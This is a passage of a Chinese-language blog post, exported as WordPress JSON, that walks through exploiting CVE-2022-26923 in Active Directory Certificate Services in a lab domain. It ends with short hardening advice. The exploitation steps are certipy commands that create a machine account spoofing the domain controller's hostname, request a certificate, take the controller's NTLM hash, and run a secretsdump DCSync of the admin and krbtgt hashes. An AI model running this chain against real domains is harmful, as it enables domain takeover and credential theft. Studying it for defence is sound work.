class=\"ez-toc-section-end\"><\/span><\/h2>\n<ul>\n<li>\n<p>\u57df\u63a7\u5b89\u88c5\u4e86\u8bc1\u4e66\u670d\u52a1<\/p>\n<\/li>\n<li>\n<p>\u5177\u6709\u4e00\u4e2a\u6709\u6743\u9650\u6dfb\u52a0\u8ba1\u7b97\u673a\u8d26\u53f7\u7684\u57df\u8d26\u53f7\uff0c\u9ed8\u8ba4\u60c5\u51b5\u4e0b\u6bcf\u4e2a\u666e\u901a\u57df\u8d26\u53f7\u6709\u6dfb\u52a010\u4e2a\u8ba1\u7b97\u673a\u8d26\u53f7\u7684\u6743\u9650<\/p>\n<\/li>\n<li>\n<p>\u8ba1\u7b97\u673a\u8d26\u53f7\u5177\u6709\u7533\u8bf7\u8ba1\u7b97\u673a\u6a21\u677f\u8bc1\u4e66\u6743\u9650\uff0c\u9ed8\u8ba4\u60c5\u51b5\u4e0b\u5177\u6709\u8fd9\u4e2a\u6743\u9650<br \/>\n<img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27a8a7fe.\" alt=\"\" \/><\/p>\n<\/li>\n<li>\n<p>CVE-2022-26923\u8865\u4e01\u6ca1\u6253<\/p>\n<\/li>\n<li>\n<p>\u65e0\u8bba\u662f\u5426\u5f00\u542f\u4e86\u8bc1\u4e66Web\u6ce8\u518c\u63a5\u53e3\u90fd\u53ef\u4ee5\u6253\uff0c\u56e0\u4e3a\u901a\u8fc7rpc\u4e5f\u53ef\u4ee5\u6ce8\u518c\u8bc1\u4e66<\/p>\n<\/li>\n<\/ul>\n<h2><span class=\"ez-toc-section\" id=\"%E4%B8%89%E3%80%81%E5%88%A9%E7%94%A8%E8%BF%87%E7%A8%8B\"><\/span>\u4e09\u3001\u5229\u7528\u8fc7\u7a0b<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><strong>\u6d4b\u8bd5\u73af\u5883\uff1a<\/strong><\/p>\n<table>\n<thead>\n<tr>\n<th>\u4e3b\u673a\u540d<\/th>\n<th>\u4e3b\u673aIP<\/th>\n<th>\u4e3b\u673a\u8d26\u6237<\/th>\n<th>\u4e3b\u673a\u63cf\u8ff0<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>dc-main-1.qiuqiu.com<\/td>\n<td>10.10.10.10<\/td>\n<td>qiuqiu.com\\domain_admin<\/td>\n<td>\u4e3b\u57df<\/td>\n<\/tr>\n<tr>\n<td>user1.qiuqiu.com<\/td>\n<td>10.100.0.6<\/td>\n<td>qiuqiu.com\\yefan<\/td>\n<td>\u666e\u901a\u57df\u5185\u673a\u5668\uff0c\u88ab\u653b\u51fb\u8005\u63a7\u5236<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3><span class=\"ez-toc-section\" id=\"1%E3%80%81%E5%AE%9A%E4%BD%8DADCS%E6%9C%8D%E5%8A%A1%E4%BB%A5%E5%8F%8ACA%E6%A0%B9%E8%AF%81%E4%B9%A6\"><\/span>1\u3001\u5b9a\u4f4dADCS\u670d\u52a1\u4ee5\u53caCA\u6839\u8bc1\u4e66<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>\u83b7\u53d6\u5230ADCS\u670d\u52a1\u5668\u5730\u5740\u4e3a<code>dc-main-1.qiuqiu.com<\/code>\uff0cCA\u6839\u8bc1\u4e66\u540d\u4e3a<code>qiuqiu-DC-MAIN-1-CA<\/code><\/p>\n<pre><code>certutil -dump -v<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27a943c8.\" alt=\"\" \/><\/p>\n<p>\u5982\u679c\u653b\u51fb\u8005\u5728\u57df\u5916\uff0c\u53ef\u4ee5\u4f7f\u7528<code>certipy<\/code>\u5de5\u5177\u5b9a\u4f4d\uff0c\u9664\u4e86\u660e\u6587\u8d26\u5bc6\uff0c\u4e5f\u652f\u6301PTH\u65b9\u5f0f\u8ba4\u8bc1\uff1a<\/p>\n<pre><code>\/\/ pip\u5b89\u88c5\npip3 install certipy-ad\n\ncertipy find -u yefan@qiuqiu.com -p Test1234 -dc-ip 10.10.10.10 -debug<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27a9dd35.\" alt=\"\" \/><\/p>\n<h3><span class=\"ez-toc-section\" id=\"2%E3%80%81%E5%88%9B%E5%BB%BA%E8%AE%A1%E7%AE%97%E6%9C%BA%E8%B4%A6%E5%8F%B7%E5%B9%B6%E8%AE%BE%E7%BD%AEdnshostname%E5%B1%9E%E6%80%A7\"><\/span>2\u3001\u521b\u5efa\u8ba1\u7b97\u673a\u8d26\u53f7\u5e76\u8bbe\u7f6ednshostname\u5c5e\u6027<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<pre><code>certipy account create -u yefan@qiuqiu.com -p Test1234 -dc-ip 10.10.10.10 -user &quot;fake_cert&quot; -pass Test1234 -dns dc-main-1.qiuqiu.com -debug<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27aa6211.\" alt=\"\" \/><\/p>\n<p>\u53ef\u4ee5\u5728\u57df\u63a7\u4e0a\u770b\u5230\uff0c\u65b0\u6dfb\u52a0\u7684\u8ba1\u7b97\u673a\u8d26\u53f7\uff0cdnshostname\u5b57\u6bb5\u4e0e\u5f53\u524d\u8d26\u53f7\u540d\u4e0d\u5339\u914d\uff1a<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27aaf67a.\" alt=\"\" \/><\/p>\n<h3><span class=\"ez-toc-section\" id=\"3%E3%80%81%E4%BD%BF%E7%94%A8%E8%AE%A1%E7%AE%97%E6%9C%BA%E8%B4%A6%E5%8F%B7%E7%94%B3%E8%AF%B7%E8%AE%A1%E7%AE%97%E6%9C%BA%E6%A8%A1%E6%9D%BF%E8%AF%81%E4%B9%A6\"><\/span>3\u3001\u4f7f\u7528\u8ba1\u7b97\u673a\u8d26\u53f7\u7533\u8bf7\u8ba1\u7b97\u673a\u6a21\u677f\u8bc1\u4e66<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>\u4f7f\u7528\u4e4b\u524d\u65b0\u521b\u5efa\u7684\u8ba1\u7b97\u673a\u8d26\u53f7\u8ba4\u8bc1\uff0c\u5e76\u4f7f\u7528ADCS\u4e2d\u7684CA\u6839\u8bc1\u4e66\u4e3a\u5f53\u524d\u8ba1\u7b97\u673a\u8d26\u53f7\u7b7e\u53d1\u4e00\u4e2a\u8ba1\u7b97\u673a\u6a21\u677f\u7684\u8bc1\u4e66\uff0c\u53ef\u4ee5\u770b\u5230\uff0c\u5f53\u8bc1\u4e66\u7533\u8bf7\u6210\u529f\u540e\uff0c\u8fd4\u56de\u7684dnshostname\u5b57\u6bb5\u4e3a\u57df\u63a7\u8ba1\u7b97\u673a\u8d26\u53f7\uff1a<\/p>\n<pre><code>certipy req -u fake_cert$ -p Test1234 -dc-ip 10.10.10.10 -ca qiuqiu-DC-MAIN-1-CA -template Machine -debug<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27ab9e63.\" alt=\"\" \/><\/p>\n<p>\u5728\u57df\u63a7\u4e0a\u53ef\u4ee5\u770b\u5230\u65b0\u9881\u53d1\u7684\u8ba1\u7b97\u673a\u8d26\u53f7\u8bc1\u4e66\uff1a<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27ac2d3d.\" alt=\"\" \/><\/p>\n<h3><span class=\"ez-toc-section\" id=\"4%E3%80%81%E4%BD%BF%E7%94%A8%E8%AF%81%E4%B9%A6%E8%BF%9B%E8%A1%8Ckerberos%E8%AE%A4%E8%AF%81%E5%B9%B6%E8%8E%B7%E5%BE%97%E5%AF%B9%E5%BA%94%E7%94%A8%E6%88%B7%E7%9A%84NTLM%E5%93%88%E5%B8%8C\"><\/span>4\u3001\u4f7f\u7528\u8bc1\u4e66\u8fdb\u884ckerberos\u8ba4\u8bc1\u5e76\u83b7\u5f97\u5bf9\u5e94\u7528\u6237\u7684NTLM\u54c8\u5e0c<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>\u4f7f\u7528\u8ba1\u7b97\u673a\u8d26\u53f7\u8bc1\u4e66\u901a\u8fc7kerberos\u8ba4\u8bc1\u540e\uff0c\u4f1a\u8fd4\u56de\u5bf9\u5e94\u7528\u6237\u7684TGT\u7968\u636e\uff0c\u5728TGT\u4e2d\u7684PAC\u4e2d\uff0c\u5305\u542b\u4e86\u7528\u6237\u7684NTLM\u54c8\u5e0c<\/p>\n<pre><code>certipy auth -pfx dc-main-1.pfx -dc-ip 10.10.10.10 -debug<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27acb407.\" alt=\"\" \/><\/p>\n<h3><span class=\"ez-toc-section\" id=\"5%E3%80%81dcsync%E5%9F%9F%E6%8E%A7hash\"><\/span>5\u3001dcsync\u57df\u63a7hash<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<pre><code>secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:6ccc4c07fe69157e48976165a273b13b &quot;qiuqiu.com\/dc-main-1$@10.10.10.10&quot;<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27ad4a32.\" alt=\"\" \/><\/p>\n<p>\u83b7\u53d6\u5230\u57df\u7ba1\u4ee5\u53cakrbtgt\u8d26\u53f7\u7684hash\uff0c\u540e\u7eed\u5229\u7528\u4e0d\u518d\u8d58\u8ff0\u3002<\/p>\n<h2><span class=\"ez-toc-section\" id=\"%E5%9B%9B%E3%80%81%E5%8A%A0%E5%9B%BA%E6%96%B9%E6%A1%88\"><\/span>\u56db\u3001\u52a0\u56fa\u65b9\u6848<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<ul>\n<li>\n<p>\u7981\u7528\u666e\u901a\u57df\u7528\u6237\u521b\u5efa\u8ba1\u7b97\u673a\u8d26\u53f7<\/p>\n<\/li>\n<li>\n<p>\u5982\u65e0\u9700\u8981\uff0c\u7981\u7528\u666e\u901a\u57df\u7528\u6237\uff0c\u4ee5\u53ca\u8ba1\u7b97\u673a\u8d26\u53f7\u521b\u5efa\u8bc1\u4e66<\/p>\n<\/li>\n<li>\n<p>\u6253\u8865\u4e01<\/p>\n<\/li>\n<\/ul>\n<\/div><\/div>","protected":false},"excerpt":{"rendered":"<p>PKI\uff08Public Key Infrastructure\uff09\u516c\u94a5\u57fa\u7840\u8bbe\u65bd\uff0c\u662f\u63d0\u4f9b\u516c\u94a5\u52a0\u5bc6\u548c\u6570\u5b57\u7b7e\u540d\u670d\u52a1\u7684\u7cfb\u7edf\u6216\u5e73\u53f0\uff0c\u662f\u4e00\u4e2a\u5305\u62ec\u786c\u4ef6\u3001\u8f6f\u4ef6\u3001\u4eba\u5458\u3001\u7b56\u7565\u548c\u89c4\u7a0b\u7684\u96c6\u5408\uff0c\u7528\u6765\u5b9e\u73b0\u57fa\u4e8e\u516c\u94a5\u5bc6\u7801\u4f53\u5236\u7684\u5bc6\u94a5\u548c\u8bc1\u4e66\u7684\u4ea7\u751f\u3001\u7ba1\u7406\u3001\u5b58\u50a8\u3001\u5206\u53d1\u548c\u64a4\u9500\u7b49\u529f\u80fd\u3002\u4f01\u4e1a\u901a\u8fc7\u91c7\u7528 PKI \u6846\u67b6\u7ba1\u7406\u5bc6\u94a5\u548c\u8bc1\u4e66\u53ef\u4ee5\u5efa\u7acb\u4e00\u4e2a\u5b89\u5168\u7684\u7f51\u7edc\u73af\u5883\u3002<\/p>\n","protected":false},"author":1,"featured_media":1022,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[322],"tags":[],"class_list":["post-1020","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v16.9 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>CVE-2022-26923\u57df\u63a7\u8bc1\u4e66\u670d\u52a1\uff08ADCS\uff09 - Wayne&#039;s Blog<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"http:\/\/weizn.net\/?p=1020\" \/>\n<meta property=\"og:locale\" content=\"zh_CN\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"CVE-2022-26923\u57df\u63a7\u8bc1\u4e66\u670d\u52a1\uff08ADCS\uff09 - Wayne&#039;s Blog\" \/>\n<meta property=\"og:description\" content=\"PKI\uff08Public Key Infrastructure\uff09\u516c\u94a5\u57fa\u7840\u8bbe\u65bd\uff0c\u662f\u63d0\u4f9b\u516c\u94a5\u52a0\u5bc6\u548c\u6570\u5b57\u7b7e\u540d\u670d\u52a1\u7684\u7cfb\u7edf\u6216\u5e73\u53f0\uff0c\u662f\u4e00\u4e2a\u5305\u62ec\u786c\u4ef6\u3001\u8f6f\u4ef6\u3001\u4eba\u5458\u3001\u7b56\u7565\u548c\u89c4\u7a0b\u7684\u96c6\u5408\uff0c\u7528\u6765\u5b9e\u73b0\u57fa\u4e8e\u516c\u94a5\u5bc6\u7801\u4f53\u5236\u7684\u5bc6\u94a5\u548c\u8bc1\u4e66\u7684\u4ea7\u751f\u3001\u7ba1\u7406\u3001\u5b58\u50a8\u3001\u5206\u53d1\u548c\u64a4\u9500\u7b49\u529f\u80fd\u3002\u4f01\u4e1a\u901a\u8fc7\u91c7\u7528 PKI \u6846\u67b6\u7ba1\u7406\u5bc6\u94a5\u548c\u8bc1\u4e66\u53ef\u4ee5\u5efa\u7acb\u4e00\u4e2a\u5b89\u5168\u7684\u7f51\u7edc\u73af\u5883\u3002\" \/>\n<meta property=\"og:url\" content=\"http:\/\/weizn.net\/?p=1020\" \/>\n<meta property=\"og:site_name\" content=\"Wayne&#039;s Blog\" \/>\n<meta property=\"article:published_time\" content=\"2023-09-21T14:42:47+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-05-08T08:51:33+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/weizn.net\/wp-content\/uploads\/2023\/06\/cert.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1996\" \/>\n\t<meta property=\"og:image:height\" content=\"966\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005\" \/>\n\t<meta name=\"twitter:data1\" content=\"zinan\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 \u5206\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"http:\/\/weizn.net\/#website\",\"url\":\"http:\/\/weizn.net\/\",\"name\":\"Wayne&#039;s Blog\",\"description\":\"\",\"publisher\":{\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"http:\/\/weizn.net\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"zh-Hans\"},{\"@type\":\"ImageObject\",\"@id\":\"http:\/\/weizn.net\/?p=1020#primaryimage\",\"inLanguage\":\"zh-Hans\",\"url\":\"http:\/\/weizn.net\/wp-content\/uploads\/2023\/06\/cert.jpg\",\"contentUrl\":\"http:\/\/weizn.net\/wp-content\/uploads\/2023\/06\/cert.jpg\",\"width\":1996,\"height\":966},{\"@type\":\"WebPage\",\"@id\":\"http:\/\/weizn.net\/?p=1020#webpage\",\"url\":\"http:\/\/weizn.net\/?p=1020\",\"name\":\"CVE-2022-26923\\u57df\\u63a7\\u8bc1\\u4e66\\u670d\\u52a1\\uff08ADCS\\uff09 - Wayne&#039;s Blog\",\"isPartOf\":{\"@id\":\"http:\/\/weizn.net\/#website\"},\"primaryImageOfPage\":{\"@id\":\"http:\/\/weizn.net\/?p=1020#primaryimage\"},\"datePublished\":\"2023-09-21T14:42:47+00:00\",\"dateModified\":\"2026-05-08T08:51:33+00:00\",\"breadcrumb\":{\"@id\":\"http:\/\/weizn.net\/?p=1020#breadcrumb\"},\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"http:\/\/weizn.net\/?p=1020\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"http:\/\/weizn.net\/?p=1020#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\\u9996\\u9875\",\"item\":\"http:\/\/weizn.net\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"CVE-2022-26923\\u57df\\u63a7\\u8bc1\\u4e66\\u670d\\u52a1\\uff08ADCS\\uff09\"}]},{\"@type\":\"Article\",\"@id\":\"http:\/\/weizn.net\/?p=1020#article\",\"isPartOf\":{\"@id\":\"http:\/\/weizn.net\/?p=1020#webpage\"},\"author\":{\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\"},\"headline\":\"CVE-2022-26923\\u57df\\u63a7\\u8bc1\\u4e66\\u670d\\u52a1\\uff08ADCS\\uff09\",\"datePublished\":\"2023-09-21T14:42:47+00:00\",\"dateModified\":\"2026-05-08T08:51:33+00:00\",\"mainEntityOfPage\":{\"@id\":\"http:\/\/weizn.net\/?p=1020#webpage\"},\"wordCount\":229,\"commentCount\":0,\"publisher\":{\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\"},\"image\":{\"@id\":\"http:\/\/weizn.net\/?p=1020#primaryimage\"},\"thumbnailUrl\":\"http:\/\/weizn.net\/wp-content\/uploads\/2023\/06\/cert.jpg\",\"articleSection\":[\"\\u6280\\u672f\\u6587\\u7ae0\"],\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"http:\/\/weizn.net\/?p=1020#respond\"]}]},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264\",\"name\":\"zinan\",\"logo\":{\"@id\":\"http:\/\/weizn.net\/#personlogo\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"CVE-2022-26923\u57df\u63a7\u8bc1\u4e66\u670d\u52a1\uff08ADCS\uff09 - Wayne&#039;s Blog","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"http:\/\/weizn.net\/?p=1020","og_locale":"zh_CN","og_type":"article","og_title":"CVE-2022-26923\u57df\u63a7\u8bc1\u4e66\u670d\u52a1\uff08ADCS\uff09 - Wayne&#039;s Blog","og_description":"PKI\uff08Public Key Infrastructure\uff09\u516c\u94a5\u57fa\u7840\u8bbe\u65bd\uff0c\u662f\u63d0\u4f9b\u516c\u94a5\u52a0\u5bc6\u548c\u6570\u5b57\u7b7e\u540d\u670d\u52a1\u7684\u7cfb\u7edf\u6216\u5e73\u53f0\uff0c\u662f\u4e00\u4e2a\u5305\u62ec\u786c\u4ef6\u3001\u8f6f\u4ef6\u3001\u4eba\u5458\u3001\u7b56\u7565\u548c\u89c4\u7a0b\u7684\u96c6\u5408\uff0c\u7528\u6765\u5b9e\u73b0\u57fa\u4e8e\u516c\u94a5\u5bc6\u7801\u4f53\u5236\u7684\u5bc6\u94a5\u548c\u8bc1\u4e66\u7684\u4ea7\u751f\u3001\u7ba1\u7406\u3001\u5b58\u50a8\u3001\u5206\u53d1\u548c\u64a4\u9500\u7b49\u529f\u80fd\u3002\u4f01\u4e1a\u901a\u8fc7\u91c7\u7528 PKI \u6846\u67b6\u7ba1\u7406\u5bc6\u94a5\u548c\u8bc1\u4e66\u53ef\u4ee5\u5efa\u7acb\u4e00\u4e2a\u5b89\u5168\u7684\u7f51\u7edc\u73af\u5883\u3002","og_url":"http:\/\/weizn.net\/?p=1020","og_site_name":"Wayne&#039;s Blog","article_published_time":"2023-09-21T14:42:47+00:00","article_modified_time":"2026-05-08T08:51:33+00:00","og_image":[{"width":1996,"height":966,"filesize":253117,"url":"http:\/\/weizn.net\/wp-content\/uploads\/2023\/06\/cert.jpg","path":"\/app\/wp-content\/uploads\/2023\/06\/cert.jpg","size":"full","id":1022,"alt":"","pixels":1928136,"type":"image\/jpeg"}],"twitter_card":"summary_large_image","twitter_misc":{"\u4f5c\u8005":"zinan","\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4":"2 \u5206"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"http:\/\/weizn.net\/#website","url":"http:\/\/weizn.net\/","name":"Wayne&#039;s Blog","description":"","publisher":{"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"http:\/\/weizn.net\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"zh-Hans"},{"@type":"ImageObject","@id":"http:\/\/weizn.net\/?p=1020#primaryimage","inLanguage":"zh-Hans","url":"http:\/\/weizn.net\/wp-content\/uploads\/2023\/06\/cert.jpg","contentUrl":"http:\/\/weizn.net\/wp-content\/uploads\/2023\/06\/cert.jpg","width":1996,"height":966},{"@type":"WebPage","@id":"http:\/\/weizn.net\/?p=1020#webpage","url":"http:\/\/weizn.net\/?p=1020","name":"CVE-2022-26923\u57df\u63a7\u8bc1\u4e66\u670d\u52a1\uff08ADCS\uff09 - Wayne&#039;s Blog","isPartOf":{"@id":"http:\/\/weizn.net\/#website"},"primaryImageOfPage":{"@id":"http:\/\/weizn.net\/?p=1020#primaryimage"},"datePublished":"2023-09-21T14:42:47+00:00","dateModified":"2026-05-08T08:51:33+00:00","breadcrumb":{"@id":"http:\/\/weizn.net\/?p=1020#breadcrumb"},"inLanguage":"zh-Hans","potentialAction":[{"@type":"ReadAction","target":["http:\/\/weizn.net\/?p=1020"]}]},{"@type":"BreadcrumbList","@id":"http:\/\/weizn.net\/?p=1020#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9875","item":"http:\/\/weizn.net\/"},{"@type":"ListItem","position":2,"name":"CVE-2022-26923\u57df\u63a7\u8bc1\u4e66\u670d\u52a1\uff08ADCS\uff09"}]},{"@type":"Article","@id":"http:\/\/weizn.net\/?p=1020#article","isPartOf":{"@id":"http:\/\/weizn.net\/?p=1020#webpage"},"author":{"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264"},"headline":"CVE-2022-26923\u57df\u63a7\u8bc1\u4e66\u670d\u52a1\uff08ADCS\uff09","datePublished":"2023-09-21T14:42:47+00:00","dateModified":"2026-05-08T08:51:33+00:00","mainEntityOfPage":{"@id":"http:\/\/weizn.net\/?p=1020#webpage"},"wordCount":229,"commentCount":0,"publisher":{"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264"},"image":{"@id":"http:\/\/weizn.net\/?p=1020#primaryimage"},"thumbnailUrl":"http:\/\/weizn.net\/wp-content\/uploads\/2023\/06\/cert.jpg","articleSection":["\u6280\u672f\u6587\u7ae0"],"inLanguage":"zh-Hans","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["http:\/\/weizn.net\/?p=1020#respond"]}]},{"@type":["Person","Organization"],"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264","name":"zinan","logo":{"@id":"http:\/\/weizn.net\/#personlogo"}}]}},"_links":{"self":[{"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/posts\/1020","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1020"}],"version-history":[{"count":2,"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/posts\/1020\/revisions"}],"predecessor-version":[{"id":1023,"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/posts\/1020\/revisions\/1023"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/media\/1022"}],"wp:attachment":[{"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1020"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1020"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1020"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}